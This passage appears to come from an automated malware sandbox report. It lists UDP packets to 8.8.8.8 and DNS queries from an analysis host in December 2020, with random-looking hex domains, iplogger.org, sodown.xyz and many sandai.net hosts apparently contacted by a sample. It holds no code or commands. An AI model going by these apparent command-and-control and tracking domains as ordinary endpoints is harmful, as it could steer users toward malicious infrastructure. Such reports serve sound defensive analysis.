                                                                                                                                                  Dec 5, 2020 08:44:28.033262014 CET53622418.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:28.345057964 CET5670953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:28.374311924 CET53567098.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:28.575939894 CET4968653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:28.613672018 CET53496868.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:28.874937057 CET5124853192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:28.910343885 CET53512488.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:28.997826099 CET6224153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:29.025007963 CET53622418.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:29.404752970 CET4967953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:29.431976080 CET53496798.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:29.942001104 CET5026353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:29.969094038 CET53502638.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:30.538630962 CET4921553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:30.574170113 CET53492158.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:30.584671974 CET4968653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:30.619970083 CET53496868.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:31.013973951 CET6224153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:31.051604033 CET53622418.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:31.092473030 CET6437253192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:31.119700909 CET53643728.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:31.612140894 CET5001653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:31.639300108 CET53500168.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:32.162920952 CET6132553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:32.198580027 CET53613258.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:32.686481953 CET4916053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:32.722119093 CET53491608.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:33.233244896 CET5126553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:33.269009113 CET53512658.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:33.780996084 CET5200653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:33.808217049 CET53520068.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:34.295671940 CET5869753192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:34.331381083 CET53586978.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:34.596105099 CET4968653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:34.631959915 CET53496868.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:34.842538118 CET5153053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:34.869741917 CET53515308.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:35.029475927 CET6224153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:35.067337036 CET53622418.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:35.360580921 CET5098953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:35.387875080 CET53509898.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:35.905311108 CET5332353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:35.940874100 CET53533238.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:36.460200071 CET5903453192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:36.487648964 CET53590348.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:37.004929066 CET5310653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:37.040384054 CET53531068.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:37.547617912 CET6213253192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:37.574875116 CET53621328.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:38.062274933 CET5448953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:38.089510918 CET53544898.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:38.577480078 CET6439053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:38.604686975 CET53643908.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:39.108922005 CET5836953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:39.136360884 CET53583698.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:39.640337944 CET6420353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:39.676059008 CET53642038.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:40.195466042 CET4923253192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:40.230995893 CET53492328.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:40.734242916 CET5255853192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:40.761543989 CET53525588.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:41.249723911 CET5355553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:41.285490036 CET53535558.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:41.781835079 CET5008353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:41.809024096 CET53500838.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:42.316418886 CET4980453192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:42.343743086 CET53498048.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:42.843507051 CET6296353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:42.879030943 CET53629638.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:43.386141062 CET6369553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:43.413537025 CET53636958.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:43.907150030 CET6429653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:43.942786932 CET53642968.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:44.437218904 CET6084453192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:44.467500925 CET53608448.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:44.984076977 CET6391753192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:45.011172056 CET53639178.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:45.500381947 CET5185153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:45.527698040 CET53518518.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:46.069277048 CET4989853192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:46.096565962 CET53498988.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:46.597650051 CET4963253192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:46.624881983 CET53496328.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:47.150854111 CET6536153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:47.186608076 CET53653618.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:47.720201015 CET5020653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:47.755641937 CET53502068.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:48.252520084 CET4961353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:48.279632092 CET53496138.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:48.798460960 CET6303253192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:48.825647116 CET53630328.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:49.317466021 CET5489853192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:49.344616890 CET53548988.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:49.859556913 CET6171053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:49.886678934 CET53617108.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:50.391560078 CET5207353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:50.418781042 CET53520738.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:50.906727076 CET6394953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:50.942514896 CET53639498.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:51.454305887 CET5756153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:51.481712103 CET53575618.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:51.970223904 CET5320553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:51.997468948 CET53532058.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:52.522691011 CET6057953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:52.558666945 CET53605798.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:53.047398090 CET4976553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:53.074649096 CET53497658.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:53.563600063 CET5765053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:53.599467039 CET53576508.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:54.095347881 CET6531753192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:54.122626066 CET53653178.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:54.626287937 CET6465453192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:54.661765099 CET53646548.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:55.156809092 CET5119153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:55.192456961 CET53511918.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:55.688621998 CET6387053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:55.715823889 CET53638708.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:56.235286951 CET5701353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:56.262578964 CET53570138.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:56.756474972 CET5874553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:56.783624887 CET53587458.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:57.310049057 CET6427253192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:57.337253094 CET53642728.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:57.830212116 CET5644053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:57.857445002 CET53564408.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:58.378381014 CET5949253192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:58.405559063 CET53594928.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:58.923456907 CET6212553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:58.950757980 CET53621258.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:59.453959942 CET6177653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:44:59.481197119 CET53617768.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:44:59.989223003 CET5392853192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:00.024873018 CET53539288.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:00.532516956 CET5105853192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:00.559737921 CET53510588.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:01.066127062 CET5671153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:01.093219995 CET53567118.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:01.598042011 CET5478053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:01.625252962 CET53547808.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:02.144747019 CET5430553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:02.171911955 CET53543058.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:02.184005022 CET6166953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:02.211256981 CET53616698.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:02.556096077 CET5733653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:02.599622011 CET53573368.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:02.690109968 CET6457753192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:02.725611925 CET53645778.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:03.221651077 CET6498753192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:03.235282898 CET5865553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:03.248840094 CET53649878.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:03.285640955 CET53586558.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:03.666244030 CET6090553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:03.701962948 CET53609058.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:03.736870050 CET6277653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:03.764144897 CET53627768.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:03.883415937 CET5692353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:03.919194937 CET53569238.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:04.267421007 CET6520153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:04.294631958 CET53652018.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:04.783400059 CET5426453192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:04.810632944 CET53542648.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:05.330240965 CET5843953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:05.357727051 CET53584398.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:05.877887964 CET5423553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:05.905102015 CET53542358.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:06.407953024 CET5587653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:06.435257912 CET53558768.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:06.940469980 CET5699453192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:06.967833042 CET53569948.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:07.470385075 CET5883253192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:07.497612953 CET53588328.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:07.985903025 CET5180053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:08.013257027 CET53518008.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:08.503778934 CET5883653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:08.530966997 CET53588368.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:09.033617020 CET6466953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:09.060971022 CET53646698.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:09.566113949 CET6473553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:09.593342066 CET53647358.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:10.112205029 CET5247253192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:10.139463902 CET53524728.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:10.626859903 CET5169753192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:10.654100895 CET53516978.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:11.142332077 CET6302053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:11.169487953 CET53630208.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:11.676170111 CET5985353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:11.703306913 CET53598538.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:12.206394911 CET6219653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:12.233783007 CET53621968.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:45:12.737648010 CET5070053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:45:12.765013933 CET53507008.8.8.8192.168.2.3

                                                                                                                                                  ICMP Packets

                                                                                                                                                  TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                  Dec 5, 2020 08:43:49.899223089 CET192.168.2.38.8.8.8d02d(Port unreachable)Destination Unreachable

                                                                                                                                                  DNS Queries

                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                  Dec 5, 2020 08:41:53.342662096 CET192.168.2.38.8.8.80x92a9Standard query (0)ef6df4af06ba6896.xyzA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:42:48.059262991 CET192.168.2.38.8.8.80xbe88Standard query (0)ef6df4af06ba6896.xyzA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:12.375412941 CET192.168.2.38.8.8.80x2421Standard query (0)1c5491a87d65f1ef.clubA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:28.374576092 CET192.168.2.38.8.8.80xf72fStandard query (0)ef6df4af06ba6896.xyzA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:33.014781952 CET192.168.2.38.8.8.80x34d3Standard query (0)ef6df4af06ba6896.xyzA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:43.564450026 CET192.168.2.38.8.8.80xdb46Standard query (0)EF6DF4AF06BA6896.xyzA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.052850008 CET192.168.2.38.8.8.80x79fcStandard query (0)hub5pnc.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.052906036 CET192.168.2.38.8.8.80x6bfcStandard query (0)hub5pn.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.448940039 CET192.168.2.38.8.8.80x600aStandard query (0)hub5u.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.488394976 CET192.168.2.38.8.8.80x7c0Standard query (0)hub5c.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.492825985 CET192.168.2.38.8.8.80x7c1Standard query (0)pmap.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.497859001 CET192.168.2.38.8.8.80x7c2Standard query (0)dream.picsA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.503201962 CET192.168.2.38.8.8.80x7c3Standard query (0)hub5idx.shub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.507247925 CET192.168.2.38.8.8.80x7c4Standard query (0)hubstat.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.886359930 CET192.168.2.38.8.8.80xf80fStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:46.924384117 CET192.168.2.38.8.8.80x6951Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:47.464710951 CET192.168.2.38.8.8.80xe8e2Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.010875940 CET192.168.2.38.8.8.80x1a3aStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.114943027 CET192.168.2.38.8.8.80x7c5Standard query (0)hub5sr.shub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.118016005 CET192.168.2.38.8.8.80x7c6Standard query (0)hub5pr.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.121144056 CET192.168.2.38.8.8.80x7c7Standard query (0)imhub5pr.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.124800920 CET192.168.2.38.8.8.80x7c8Standard query (0)score.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.469470978 CET192.168.2.38.8.8.80x7c8Standard query (0)score.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.470809937 CET192.168.2.38.8.8.80xfb24Standard query (0)score.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.506843090 CET192.168.2.38.8.8.80x7c8Standard query (0)score.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.508157969 CET192.168.2.38.8.8.80xeaf4Standard query (0)score.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.541522980 CET192.168.2.38.8.8.80x7c7Standard query (0)imhub5pr.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.542855978 CET192.168.2.38.8.8.80x5596Standard query (0)imhub5pr.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.557689905 CET192.168.2.38.8.8.80x7b6aStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.578788042 CET192.168.2.38.8.8.80x7c7Standard query (0)imhub5pr.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.580691099 CET192.168.2.38.8.8.80x88b9Standard query (0)imhub5pr.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.616544008 CET192.168.2.38.8.8.80x7c7Standard query (0)imhub5pr.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.617836952 CET192.168.2.38.8.8.80xe1d0Standard query (0)imhub5pr.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.654639006 CET192.168.2.38.8.8.80x7c7Standard query (0)imhub5pr.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.656128883 CET192.168.2.38.8.8.80x6fbStandard query (0)imhub5pr.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.692184925 CET192.168.2.38.8.8.80x7c7Standard query (0)imhub5pr.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:48.693607092 CET192.168.2.38.8.8.80x621fStandard query (0)imhub5pr.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:49.105391026 CET192.168.2.38.8.8.80xfec2Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:49.510230064 CET192.168.2.38.8.8.80xeaf4Standard query (0)score.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:49.546184063 CET192.168.2.38.8.8.80x7c8Standard query (0)score.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:49.547491074 CET192.168.2.38.8.8.80x20dbStandard query (0)score.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:49.651437044 CET192.168.2.38.8.8.80xb67Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:49.932180882 CET192.168.2.38.8.8.80x7c8Standard query (0)score.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:49.933799028 CET192.168.2.38.8.8.80xe49bStandard query (0)score.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:49.971388102 CET192.168.2.38.8.8.80x7c8Standard query (0)score.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:49.973582029 CET192.168.2.38.8.8.80x709aStandard query (0)score.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:50.183084011 CET192.168.2.38.8.8.80xd672Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:50.730550051 CET192.168.2.38.8.8.80x7fcdStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:51.276849031 CET192.168.2.38.8.8.80x2599Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:51.823340893 CET192.168.2.38.8.8.80x1fafStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:52.408591986 CET192.168.2.38.8.8.80x7d31Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:52.955682993 CET192.168.2.38.8.8.80x3923Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:56.625580072 CET192.168.2.38.8.8.80x7a6dStandard query (0)iplogger.orgA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:57.236421108 CET192.168.2.38.8.8.80xd060Standard query (0)iplogger.orgA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.803669930 CET192.168.2.38.8.8.80x27c6Standard query (0)hub5pnc.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.804709911 CET192.168.2.38.8.8.80x49b7Standard query (0)hub5pn.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.846127987 CET192.168.2.38.8.8.80xceb2Standard query (0)hub5u.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.857948065 CET192.168.2.38.8.8.80x7c0Standard query (0)hub5c.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.864092112 CET192.168.2.38.8.8.80x7c1Standard query (0)pmap.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.870414019 CET192.168.2.38.8.8.80x7c2Standard query (0)www.sodown.xyzA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.875919104 CET192.168.2.38.8.8.80x7c3Standard query (0)hub5idx.shub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.884202003 CET192.168.2.38.8.8.80x8e07Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.885776997 CET192.168.2.38.8.8.80x7c4Standard query (0)hubstat.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.921621084 CET192.168.2.38.8.8.80x1789Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
